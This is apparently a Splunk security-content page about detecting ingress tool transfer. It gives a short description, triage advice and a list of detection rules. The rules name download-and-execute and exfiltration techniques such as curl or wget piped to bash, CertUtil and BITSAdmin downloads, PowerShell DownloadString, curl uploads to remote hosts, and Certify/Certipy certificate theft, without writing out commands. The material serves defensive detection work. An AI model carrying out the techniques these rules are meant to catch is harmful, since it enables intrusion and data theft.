Try in Splunk Security Cloud

Description

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the Command And Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-24
  • Author: Michael Haag, Splunk
  • ID: b3782036-8cbd-11eb-9d8e-acde48001122

Narrative

Ingress tool transfer is a Technique under tactic Command And Control. Behaviors will include the use of living off the land binaries to download implants or binaries over alternate communication ports. It is imperative to baseline applications on endpoints to understand what generates network activity, to where, and what is its native behavior. These utilities, when abused, will write files to disk in world writeable paths.\ During triage, review the reputation of the remote public destination IP or domain. Capture any files written to disk and perform analysis. Review other parrallel processes for additional behaviors.

Detections

Name Technique Type
Any Powershell DownloadFile Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer TTP
Any Powershell DownloadString Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer TTP
BITSAdmin Download File BITS Jobs, Ingress Tool Transfer TTP
CertUtil Download With URLCache and Split Arguments Ingress Tool Transfer TTP
CertUtil Download With VerifyCtl and Split Arguments Ingress Tool Transfer TTP
Curl Download and Bash Execution Ingress Tool Transfer TTP
Detect Certify Command Line Arguments Steal or Forge Authentication Certificates, Ingress Tool Transfer TTP
Detect Certipy File Modifications Steal or Forge Authentication Certificates, Archive Collected Data TTP
Linux Curl Upload File Ingress Tool Transfer TTP
Linux Ingress Tool Transfer Hunting Ingress Tool Transfer Hunting
Linux Ingress Tool Transfer with Curl Ingress Tool Transfer Anomaly
Linux Proxy Socks Curl Proxy, Non-Application Layer Protocol TTP
Suspicious Curl Network Connection Ingress Tool Transfer TTP
Wget Download and Bash Execution Ingress Tool Transfer TTP
Windows Bitsadmin Download File BITS Jobs, Ingress Tool Transfer TTP
Windows CertUtil URLCache Download Ingress Tool Transfer TTP
Windows CertUtil VerifyCtl Download Ingress Tool Transfer TTP
Windows Curl Download to Suspicious Path Ingress Tool Transfer TTP
Windows Curl Upload to Remote Destination Ingress Tool Transfer TTP
Windows Curl Upload to Remote Destination Ingress Tool Transfer TTP
Windows Powershell DownloadFile Automated Exfiltration Anomaly

Reference

source | version: 1